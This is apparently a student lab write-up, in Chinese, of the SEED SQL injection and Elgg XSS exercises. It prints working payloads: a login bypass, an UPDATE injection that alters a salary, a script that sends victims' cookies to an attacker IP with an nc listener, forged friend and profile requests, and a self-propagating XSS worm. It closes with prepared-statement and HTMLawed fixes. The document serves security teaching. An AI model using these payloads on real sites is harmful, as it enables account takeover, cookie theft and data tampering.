20222807 2022-2023-2 《网络攻防实践》第十周作业

最新推荐文章于 2024-09-16 09:36:19 发布
最新推荐文章于 2024-09-16 09:36:19 发布
阅读量149 收藏
点赞数
文章标签: 网络 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cc3da/article/details/130606919
版权

实践十 Web应用程序安全攻防

1.实践内容

(1)SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序,并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:

  • 熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。

  • 对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。

  • 对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

  • SQL对抗:修复上述SQL注入攻击漏洞。

(2)SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。

  • 发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。

  • 弹窗显示cookie信息:将cookie信息显示。

  • 窃取受害者的cookies:将cookie发送给攻击者。

  • 成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。

  • 修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。

  • 编写XSS蠕虫。

  • 对抗XSS攻击。

2.实践过程

(1)SEED SQL注入攻击与防御实验

打开seed虚拟机,输入mysql -u root -p登录mysql,密码为seedubuntu

在这里插入图片描述

  • 熟悉SQL语句

输入指令use Users和show tables查看数据表

在这里插入图片描述

输入指令select * from credential; 在这里可以看到员工各项信息。

在这里插入图片描述

  • 对SELECT语句的SQL注入攻击

然后打开浏览器并打开www.SEEDLabSQLInjection.com网站

在这里插入图片描述

输入任意的账号密码,点击login并按f12查看,可以看到行校验的是unsafe_home.php

在这里插入图片描述

接下来在终端输入vim /var/www/SQLInjection/unsafe_home.php 打开unsafe_home.php文件,可以看到数据库的用户名为root,密码为seedubuntu

在这里插入图片描述

当用户名是admin时,用户信息表名为credential

在这里插入图片描述

回到登录界面,使用字符串admin '#进行登录,由于#后面的语句被注释掉了不会执行,可以跳过密码的校验

在这里插入图片描述

在这里插入图片描述

  • 对SELECT语句的SQL注入攻击

UPDATE语句的内容在是unsafe_edit_backend.php中,输入vim /var/www/SQLInjection/unsafe_edit_backend.php 打开源代码,找到update的部分

在这里插入图片描述
可以看到更新信息的update语句,首先获取nickname的修改值,若输入nickname时第一个字符输入’,与输入内容前的 ’ 完成修改值录入,此时直接输入sql语句会被运行,最后以#结尾注释掉后续代码,即可完成sql注入攻击

使用之前所述的方法登录网站,将admin改为Ryan,登录到Ryan的信息界面

在这里插入图片描述

点击Edit Profile,在nickname一栏输入’, salary=‘88888888’ where EID=‘30000’;#

在这里插入图片描述

点击保存,发现工资被成功通过sql注入攻击修改

在这里插入图片描述

  • SQL对抗:修复上述SQL注入攻击漏洞。

在unsafe_edit_backend.php中修改update部分,改为`

$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);`

在这里插入图片描述

此外,修改unsafe_home.php文件的select语句部分,修改为

$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email, nickname, Password From credential WHERE name= ? and Password=?;");
$sql->bind_param("ss",$input_uname,$hashed_pwd);

在这里插入图片描述
在这里插入图片描述

此时再次使用sql注入攻击会无法登录

在这里插入图片描述

(2)SEED XSS跨站脚本攻击实验(Elgg)

访问网站http://www.xsslabelgg.com

在这里插入图片描述

输入用户名alice,密码seedalice登录

在这里插入图片描述

  • 发布恶意消息,显示警报窗口:

点击左上角的头像进入用户信息界面,再点击edit profile

在这里插入图片描述

在brief description中添加js代码

在这里插入图片描述

登录boby账号,搜索alice账号信息并查看,成功出现弹窗

在这里插入图片描述在这里插入图片描述

  • 弹窗显示cookie信息:
    按照上述步骤为boby添加js代码

在这里插入图片描述

此时登录alice账号,查看boby的信息会出现cookie弹窗

在这里插入图片描述

  • 窃取受害者的cookies:

按照上述步骤,输入以下js代码

<script>
  document.write('<img src=http://192.168.200.7:5555?c=' + escape(document.cookie) + '>');
</script>

在这里插入图片描述

输入nc -l 5555 -v指令进行监听,登录alice账号,查看boby的主页,访问者的cookie信息就被获得

在这里插入图片描述
在这里插入图片描述

  • 成为受害者的朋友:

登录alice并搜索boby,点击add friend

在这里插入图片描述
按f12可以看到添加朋友发送的请求数据包,查看 request url,发现有三个请求参数friend、__elgg_ts和__elgg_token

在这里插入图片描述
添加js代码

<script type="text/javascript">
window.onload = function () {
	var Ajax=null;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;
	var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token; 
	Ajax=new XMLHttpRequest();
	Ajax.open("GET",sendurl,true);
	Ajax.setRequestHeader("Host","www.xsslabelgg.com");
	Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	Ajax.send();
}
</script>

在这里插入图片描述
在这里插入图片描述

此时登录alice,搜索并查看boby主页,被自动添加为好友

在这里插入图片描述

  • 修改受害者的信息:

查看修改信息时的请求包

在这里插入图片描述

编辑alice信息,添加js代码

<script type="text/javascript">
    window.onload = function(){
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var content= token + ts + "name=" + userName + "&description=<p>20222807cjl</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        var samyGuid=44;
        if(elgg.session.user.guid!=samyGuid)
        {
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
	}
</script>

在这里插入图片描述

此时登录boby账号,查看alice主页,返回发现主页信息被修改

在这里插入图片描述
在这里插入图片描述

  • 编写XSS蠕虫。

修改alice的about me如下

<script id="worm" type="text/javascript">
	window.onload = function(){
		var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
		var jsCode = document.getElementById("worm").innerHTML;
		var tailTag = "</" + "script>"; 
		var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

		var userName=elgg.session.user.name;
		var guid="&guid="+elgg.session.user.guid;
		var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token="&__elgg_token="+elgg.security.token.__elgg_token;

		//Construct the content of your url.
		var content= token + ts + "&name=" + userName + "&description=<p>20222087cjl"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
		alert(content)

		var samyGuid=44;

		if(elgg.session.user.guid!=samyGuid)
		{
			var Ajax=null;
			Ajax=new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Host","www.xsslabelgg.com");
			Ajax.setRequestHeader("Content-Type",
			"application/x-www-form-urlencoded");
			Ajax.send(content);
		}
		
	}
</script>

在这里插入图片描述

用boby查看alice的主页,再切换到admin账号访问boby主页,发现同样被修改

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

  • 对抗XSS攻击。

登录admin账户,在"Account->administration->plugins->Security and Spam"路径下,找到HTMLawed,点击activate使其运行

在这里插入图片描述

此时查看alice的主页,可以看到代码被作为about me的文本显示了

在这里插入图片描述

3.学习中遇到的问题及解决

  • 问题1:再about me中输入js代码保存后没有产生预期的结果
  • 问题1解决方案:在修改信息界面中点击edit HTML后再输入代码
    在这里插入图片描述在这里插入图片描述

4.实践总结

本次实验实践性较强,通过在一个具体的网站系统进行攻击与防御学习了一些具体的网络攻防方法和场景

参考资料

  • [《网络攻防技术与实践》诸葛建伟著]
20222807陈金麟
关注
20222928 2022-2023-2 《网络攻防实践》第二作业
qq_43791615的博客
03-12 241
20222928 2022-2023-2 《网络攻防实践》第二作业
20222925 2022-2023-2 《网络攻防实践第十作业
少壮不努力 老大徒伤悲
05-17 224
通过本次实验,熟悉巩固了SQL语句,注入攻击时,在参数name或password中插入了特殊字符#,以篡改程序SQL的条件判断,从而骗过程序,达到注入攻击的目的。另外,攻击者利用XSS漏洞构建恶意脚本,对大量用户构成危害,可以通过留言本、论坛、博客等方式达到目的。
20221909 2022-2023-2 《网络攻防实践》第3作业
zxr287的博客
03-16 309
1
20222807 2022-2023-2 《网络攻防实践》第二作业
cc3da的博客
03-12 381
网络攻防实践》第二作业
20222925 2022-2023-2 《网络攻防实践》第八次作业
少壮不努力 老大徒伤悲
05-06 263
通过命令“md5sum Rada.exe”查看Rada.exe的摘要信息,结果为:caaa6985a43225a0b3add54f44a0d4c7或通过命令“file RaDa.exe”查看文件格式和操作环境等帮助识别同一样本的基本信息通过本次实践,我学会了通过使用PEiD、IDA等工具分析恶意代码,获取恶意代码的各项信息,对一些端口的攻击命令也更敏感,同时也提高了自我学习的能力以及从繁杂的信息中获取有用信息的能力。
20221902 2022-2023-2 《网络攻防实践》第八次作业
xiannvyeye的博客
04-27 319
现有的恶意代码变种,在实现上可大致分为两类:一类是基于基础技术的共用,恶意代码开发人员通过重用基础模块实现变种;一类是恶意代码专门针对现有防范技术而设计开发的混淆技术。混淆技术按实现机理,可分为两类:一类是干扰反汇编的混淆,使反汇编无法得到正确结果,从而阻碍进一步分析;另一类是指令/控制流混淆,此类混淆技术通常采用垃圾代码插入、寄存器重分配、等价指令替换及代码变换等方式,改变代码的语法特征,隐藏其内部逻辑关系。
20222925 2022-2023-2 《网络攻防实践第十一次作业
少壮不努力 老大徒伤悲
05-24 323
一、实践内容 1、Web浏览的安全问题与威胁 Web浏览器软件的安全困境三要素 在复杂性方面,现代Web浏览器软件由于需要支持多种类型应用层协议、一系列页面标准规范、多种客户端执行环境,并满足大量的用户浏览需求,因此变得非常复杂和庞大。 在可扩展性方面,现代Web浏览器可能是最突出可扩展特性支持的软件类型。 在连通性方面,现代Web浏览器本身就是要为用户实现“随时随地浏览互联网”。 Web浏览安全威胁 作为整个Web应用体系结构中的客户端,Web浏览器所处系统平台、Web浏览器软件及插件程序、以及使用浏览器
4.网络编程
weixin_45476535的博客
09-14 468
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
使用堡垒机登录ftp服务报网络不可达错误
ajax_beijing_java的博客
09-14 188
解决方法:由于不想安装额外的服务在服务器上,于是想到使用sftp服务代替ftp服务,发现是可以使用的。22端口默认就是启动的,在堡垒机上加了sftp服务,再次连接服务器并使用filezila传输文件 ,文件可以正常传输。至此,问题得到解决。场景:开发同事想使用ftp传输服务,连接服务器时报网络不可达错误。排查发现,如果想使用ftp服务,需要在服务器上部署ftp服务,21端口才会存在,才可以访问该服务。
【计算机网络 - 基础问题】每日 3 题(七)
最新发布
Newin2020的博客
09-16 870
✍个人博客:Pandaconda-CSDN博客📣专栏地址:http://t.csdnimg.cn/fYaBd📚专栏简介:在这个专栏中,我将会分享 C++ 面试中常见的面试题给大家~📝推荐参考地址:https://www.xiaolincoding.com/(这个大佬的专栏非常有用!
【计网】从零开始使用UDP进行socket编程 --- 客户端与服务端的通信实现
叫我龙翔的博客
09-14 1109
本文讲解了UDP协议下的服务端与客户端通信过程!!!
iptables实现内外网ip转换
m0_67475830的博客
09-13 482
准备三台虚拟机。
C#使用TCP-S7协议读写西门子PLC(三)
ylq1045的专栏
09-11 842
这里我们进行封装读写西门子PLC的S7协议命令以及连接西门子PLC并两次握手 新建部分类文件SiemensS7ProtocolUtil.ReadWrite.cs 主要方法: 连接西门子PLC并发送两次握手。两次握手成功后,才真正连接到PLC public OperateResult ConnectPlcAndHandshake(SiemensPlcCategory siemensPlcCategory, IPEndPoint endPoint, int timeout = 3000) 生成一个写入字节数据
哪些行业需要办理网络文化经营许可证?
众森企服
09-13 1001
本规定所称互联网文化产品是指通过互联网生产、传播和流通的文化产品,主要包括: (一)专门为互联网而生产的网络音乐娱乐、网络游戏、网络演出剧(节)目、网络表演、网络艺术品、网络动漫等互联网文化产品;网络表演指以网络表演者个人现场进行的文艺表演活动等为主要内容,通过互联网、移动通讯网、移动互联网等信息网络,实时传播或者以音视频形式上载传播而现场的互联网文化产品,电商类、教育类、医疗类、培训类、金融类、旅游类、美食类、体育类、聊天类等直播不属于网络表演。1️⃣音乐娱乐产品(音乐网站、手机音乐网站、APP音乐)
yolo自动化项目实例解析(一)日志格式输出、并发异步多线程、websocket、循环截图、yolo推理、3d寻路
默子昂
09-14 2109
如果收到的消息是 "是否回放中 真" 或 "是否回放中 假",则设置 state.状态_是否回放中 为 True 或 False。如果消息以 "录制的脚本" 开头,那么它会提取脚本内容,并更新 state.录制_脚本文本 变量。它首先向客户端发送一条“连接成功”的消息,并将新连接的客户端添加到connected_clients列表中。接着,它进入一个无限循环,接收来自客户端的消息,并根据消息的不同类型更新一些状态变量。如果端口被占用,它会让用户输入一个新的端口号,并将这个新的端口号保存到配置文件中。
网络分析仪仪器校准要怎么进行检测?容易出现哪些误差?
2401_83476848的博客
09-12 395
误差修正是对已知校准标准的测量,这些测量值存储在分析仪的存储器之中,数据用于计算误差模型。系统误差是由矢量网络分析仪和测试设置之中的缺陷引起的,是重复性误差,并假设它不随时间变化。校准件的使用可以达到减少误差的目的。2.开关重复性误差:分析仪中用于切换源衰减器设置的机械式RF开关,有时当机械式RF开关被启动时,触点的闭合方式与上次启动时不同。通过仪器校准措施增强,消除反射测量之中的三个系统误差:指向性、源匹配、频率响应。:是由于仪器或测试系统仪器校准之后性能发生变化引起的,主要是温度变化引起的。
.[[BitCloud@cock.li]].wstop勒索病毒数据怎么处理|数据解密恢复
数据恢复研究℃
09-11 920
导言随着网络技术的不断发展,勒索病毒已经成为网络安全领域的一大威胁。其中,.[[]].wstop、[[BitCloud@cock.li]].wstop 、[[BaseData@airmail.cc]].wstop勒索病毒作为一种新型的恶意软件,以其复杂的加密技术和隐蔽的传播方式,给个人和企业带来了巨大的数据安全和经济损失风险。本文将详细介绍.[[
【计算机网络 - 基础问题】每日 3 题(五)
Newin2020的博客
09-15 589
在计算机网络中,端口是一种逻辑上的概念,用于标识不同的网络应用程序或服务。端口是一个 16 位的整数,其取值范围是 0 到 65535。端口的作用是在一台计算机上区分不同的网络通信进程或服务。可以把计算机比作一个大楼,IP 地址就像大楼的地址,而端口就像是大楼里不同房间的门牌号。当网络数据包到达计算机时,除了通过 IP 地址找到这台计算机,还需要通过端口号将数据包准确地交给对应的应用程序或服务进行处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值